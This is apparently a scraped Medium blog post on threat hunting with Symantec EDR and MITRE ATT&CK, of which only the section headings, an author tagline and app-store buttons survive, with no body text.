Threat Hunting with Symantec EDR and ATT&CK

Image for post
Image for post

Symantec Endpoint Detection and Response

Symantec Online Network for Advanced Response (SONAR)

Advanced Attack Techniques

Advanced Machine Learning

Symantec EDR Events

Symantec EDR Events Fields

Parent and Child Processes — Command Line

Parent and Child Processes — Executables Name

MITRE ATT&CK Integration

SONAR and Heuristics

Data Enrichment

Let The Hunt Begin

Written by

#ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store